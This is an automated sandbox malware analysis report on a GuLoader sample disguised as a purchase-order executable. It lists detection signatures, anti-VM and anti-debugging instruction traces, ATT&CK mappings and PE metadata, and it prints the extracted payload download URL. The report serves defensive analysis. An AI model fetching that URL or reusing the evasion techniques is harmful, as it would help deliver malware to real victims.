Play interactive tour

Edit tour

Analysis Report Pedido N#U00famero 4432003039.exe

Overview

General Information

Sample Name:	Pedido N#U00famero 4432003039.exe
Analysis ID:	433934
MD5:	d7c368f0c65c2a8c565df3815e70ef9e
SHA1:	0ff96bb6c163c9dfc6f5e42c4407347c947dcb6c
SHA256:	439b1ce1850d9e816c22919cc13a412b9d1f00098486a642e97f34e7a62bd63a
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found potential dummy code loops (likely to delay analysis)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected potential crypto function

PE file contains strange resources

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Pedido N#U00famero 4432003039.exe (PID: 6236 cmdline: 'C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe' MD5: D7C368F0C65C2A8C565DF3815E70EF9E)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://andreameixueiro.com/karin_vJoQSJCpNl6.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://andreameixueiro.com/karin_vJoQSJCpNl6.bin"}

Multi AV Scanner detection for submitted file

Show sources

Source: Pedido N#U00famero 4432003039.exe	Virustotal: Detection: 50%	Perma Link
Source: Pedido N#U00famero 4432003039.exe	Metadefender: Detection: 34%	Perma Link
Source: Pedido N#U00famero 4432003039.exe	ReversingLabs: Detection: 62%

Source: Pedido N#U00famero 4432003039.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://andreameixueiro.com/karin_vJoQSJCpNl6.bin

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD559D NtAllocateVirtualMemory,		0_2_02AD559D
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD55A5 NtAllocateVirtualMemory,		0_2_02AD55A5

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD559D	0_2_02AD559D
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2EA2	0_2_02AD2EA2
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD3EBF	0_2_02AD3EBF
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2A6A	0_2_02AD2A6A
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD0266	0_2_02AD0266
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD5242	0_2_02AD5242
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD479E	0_2_02AD479E
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD83F5	0_2_02AD83F5
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD3715	0_2_02AD3715
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD3F63	0_2_02AD3F63
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD4345	0_2_02AD4345
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD0341	0_2_02AD0341
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2C89	0_2_02AD2C89
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD7CEF	0_2_02AD7CEF
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD1CD8	0_2_02AD1CD8
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2CDB	0_2_02AD2CDB
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD082F	0_2_02AD082F
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD281E	0_2_02AD281E
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2819	0_2_02AD2819
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD9069	0_2_02AD9069
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD905A	0_2_02AD905A
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD55A5	0_2_02AD55A5
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD51B0	0_2_02AD51B0
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2DB3	0_2_02AD2DB3
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD0594	0_2_02AD0594
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD01FC	0_2_02AD01FC
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD29C3	0_2_02AD29C3
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD8147	0_2_02AD8147

Source: Pedido N#U00famero 4432003039.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Pedido N#U00famero 4432003039.exe, 00000000.00000002.764259501.0000000002950000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesamm.exeFE2X vs Pedido N#U00famero 4432003039.exe
Source: Pedido N#U00famero 4432003039.exe, 00000000.00000002.758690514.0000000000431000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamesamm.exe vs Pedido N#U00famero 4432003039.exe
Source: Pedido N#U00famero 4432003039.exe	Binary or memory string: OriginalFilenamesamm.exe vs Pedido N#U00famero 4432003039.exe

Source: Pedido N#U00famero 4432003039.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal92.rans.troj.evad.winEXE@1/0@0/0

Source: Pedido N#U00famero 4432003039.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Pedido N#U00famero 4432003039.exe	Virustotal: Detection: 50%
Source: Pedido N#U00famero 4432003039.exe	Metadefender: Detection: 34%
Source: Pedido N#U00famero 4432003039.exe	ReversingLabs: Detection: 62%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_0041F015 pushfd ; iretd	0_2_0041F06D
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_0041F018 pushfd ; iretd	0_2_0041F06D
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_0041E0FA push ebx; ret	0_2_0041E0FB
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_0041AB4F pushfd ; iretd	0_2_0041AB8D
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_0041AB86 pushfd ; iretd	0_2_0041AB8D
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_0041F3AC pushad ; iretd	0_2_0041F3CB
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E15F3 push edx; ret	0_2_005E1621
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E1054 push edx; ret	0_2_005E1081
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E2854 push edx; ret	0_2_005E2881
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E4054 push edx; ret	0_2_005E4081
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E5854 push edx; ret	0_2_005E5881
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E7054 push edx; ret	0_2_005E7081
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E6844 push edx; ret	0_2_005E6871
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E0843 push edx; ret	0_2_005E0871
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E2043 push edx; ret	0_2_005E2071
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E3843 push edx; ret	0_2_005E3871
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E5043 push edx; ret	0_2_005E5071
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E0878 push edx; ret	0_2_005E08A1
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E2074 push edx; ret	0_2_005E20A1
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E3874 push edx; ret	0_2_005E38A1
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E5074 push edx; ret	0_2_005E50A1
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E6875 push edx; ret	0_2_005E68A1
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E0068 push edx; ret	0_2_005E0091
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E6065 push edx; ret	0_2_005E6091
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E3063 push edx; ret	0_2_005E3091
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E1863 push edx; ret	0_2_005E1891
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E4863 push edx; ret	0_2_005E4891
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E0818 push edx; ret	0_2_005E0841
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E6814 push edx; ret	0_2_005E6841
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E3813 push edx; ret	0_2_005E3841
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_005E2013 push edx; ret	0_2_005E2041

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD63BD	0_2_02AD63BD
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD60F8	0_2_02AD60F8
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD1CD8	0_2_02AD1CD8
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD61DB	0_2_02AD61DB

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

RDTSC instruction interceptor: First address: 0000000002AD92FE second address: 0000000002AD92FE instructions:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	RDTSC instruction interceptor: First address: 0000000002AD7E11 second address: 0000000002AD7E3C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp cl, bl 0x00000005 test bh, bh 0x00000007 mov esi, 8C42B5F4h 0x0000000c xor esi, B79F116Eh 0x00000012 cmp cx, cx 0x00000015 xor esi, 85571E78h 0x0000001b cmp al, bl 0x0000001d sub esi, BE89CAE2h 0x00000023 test bl, bl 0x00000025 pushad 0x00000026 mov ecx, 000000C3h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	RDTSC instruction interceptor: First address: 0000000002AD7E3C second address: 0000000002AD7E62 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp cl, bl 0x00000005 test bh, bh 0x00000007 add esi, 00001000h 0x0000000d cmp cx, cx 0x00000010 cmp esi, 0000F000h 0x00000016 je 00007F9DDCF52513h 0x0000001c cmp al, bl 0x0000001e test bl, bl 0x00000020 pushad 0x00000021 mov ecx, 00000009h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	RDTSC instruction interceptor: First address: 0000000002AD7E62 second address: 0000000002AD7EA1 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp esi, 7FFFF000h 0x00000009 je 00007F9DDCF771CAh 0x0000000f cmp cl, bl 0x00000011 push 764A4EDBh 0x00000016 test bh, bh 0x00000018 xor dword ptr [esp], DE964CF3h 0x0000001f xor dword ptr [esp], 78705B66h 0x00000026 cmp cx, cx 0x00000029 add dword ptr [esp], 2F53A6B2h 0x00000030 cmp al, bl 0x00000032 push 74674D7Ah 0x00000037 test bl, bl 0x00000039 pushad 0x0000003a mov ecx, 000000A7h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	RDTSC instruction interceptor: First address: 0000000002AD92FE second address: 0000000002AD92FE instructions:
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	RDTSC instruction interceptor: First address: 0000000002AD7FDA second address: 0000000002AD802C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+00000212h], eax 0x00000009 test dl, dl 0x0000000b mov eax, ebx 0x0000000d push eax 0x0000000e cmp ah, ch 0x00000010 mov eax, dword ptr [ebp+00000212h] 0x00000016 mov dword ptr [ebp+00000231h], esi 0x0000001c cmp edx, BA999675h 0x00000022 mov esi, ecx 0x00000024 push esi 0x00000025 mov esi, dword ptr [ebp+00000231h] 0x0000002b mov dword ptr [ebp+00000243h], ecx 0x00000031 mov ecx, esi 0x00000033 test ch, 0000000Fh 0x00000036 push ecx 0x00000037 mov ecx, dword ptr [ebp+00000243h] 0x0000003d test edx, ecx 0x0000003f mov dword ptr [ebp+00000198h], eax 0x00000045 cmp bx, 5F43h 0x0000004a mov eax, esi 0x0000004c pushad 0x0000004d mov ebx, 0000006Fh 0x00000052 rdtsc

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Code function: 0_2_02AD559D rdtsc

0_2_02AD559D

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Code function: 0_2_02AD559D rdtsc

0_2_02AD559D

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD83F5 mov eax, dword ptr fs:[00000030h]	0_2_02AD83F5
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD3715 mov eax, dword ptr fs:[00000030h]	0_2_02AD3715
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD2C89 mov eax, dword ptr fs:[00000030h]	0_2_02AD2C89
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD78E5 mov eax, dword ptr fs:[00000030h]	0_2_02AD78E5
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD741C mov eax, dword ptr fs:[00000030h]	0_2_02AD741C
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD517B mov eax, dword ptr fs:[00000030h]	0_2_02AD517B
Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe	Code function: 0_2_02AD8147 mov eax, dword ptr fs:[00000030h]	0_2_02AD8147

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: Pedido N#U00famero 4432003039.exe, 00000000.00000002.759701760.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: Pedido N#U00famero 4432003039.exe, 00000000.00000002.759701760.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Pedido N#U00famero 4432003039.exe, 00000000.00000002.759701760.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Pedido N#U00famero 4432003039.exe, 00000000.00000002.759701760.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe

Code function: 0_2_02AD63BD cpuid

0_2_02AD63BD

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery311	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Pedido N#U00famero 4432003039.exe	50%	Virustotal		Browse
Pedido N#U00famero 4432003039.exe	34%	Metadefender		Browse
Pedido N#U00famero 4432003039.exe	62%	ReversingLabs	Win32.Trojan.Vebzenpak

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://andreameixueiro.com/karin_vJoQSJCpNl6.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://andreameixueiro.com/karin_vJoQSJCpNl6.bin	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	433934
Start date:	14.06.2021
Start time:	08:18:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Pedido N#U00famero 4432003039.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.rans.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.3% (good quality ratio 0.3%) Quality average: 50.2% Quality standard deviation: 2.2%
HCA Information:	Successful, ratio: 52% Number of executed functions: 8 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	3.8667127538435073
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Pedido N#U00famero 4432003039.exe
File size:	204800
MD5:	d7c368f0c65c2a8c565df3815e70ef9e
SHA1:	0ff96bb6c163c9dfc6f5e42c4407347c947dcb6c
SHA256:	439b1ce1850d9e816c22919cc13a412b9d1f00098486a642e97f34e7a62bd63a
SHA512:	05ff5aa7839f6ad1c9d004ce72ab20b51b1a844892694ab2124b11a52a165dad60e9020e91f14f7812371eccd26684585da349a27311636862b51809d2de0253
SSDEEP:	1536:JFNAAUuyxDi/795L+oJZzQwiVCw49lmWA6WWwdQxo:8ubh5LpJZzQRwxVWWwdQq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L......P..................... ......h.............@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x401368
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x50CD8DA9 [Sun Dec 16 09:00:25 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b2e3727c442d471988cc35e3702b319a

Entrypoint Preview

Instruction
push 00429D50h
call 00007F9DDCF8FCA3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
bound ebp, dword ptr [ecx-54h]
sub al, 1Fh
push edi
cmovnp ecx, dword ptr [edx-42CA7492h]
cmp eax, 000046ACh
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 42h
outsd
jo 00007F9DDCF8FD25h
add byte ptr [ebp-02h], ah
add al, byte ptr [eax]
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
adc byte ptr [esi], ah
and dl, byte ptr [edx]
loope 00007F9DDCF8FC8Bh
cld
inc ecx
mov al, cl
push ss
dec eax
lds ebp, fword ptr [esi-6D3C4F37h]
mov eax, dword ptr [54832916h]
inc edi
stosb
or ecx, dword ptr [esi]
js 00007F9DDCF8FCCBh
cmp byte ptr [AD4F3AB9h], dh
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
movsb
mov byte ptr [edx], al
add byte ptr [eax+00h], cl
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [ebp+esi*2+62h], al
bound esp, dword ptr [ebp+72h]
add byte ptr [42000A01h], cl
jc 00007F9DDCF8FD1Dh
insd
imul esp, dword ptr [esp+ebp*2+65h], 19003372h
add dword ptr [eax], eax
inc edx
add byte ptr [edx], ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f204	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0x984	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x128	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2e6dc	0x2f000	False	0.217976022274	data	3.95853038654	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x30000	0xa7c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
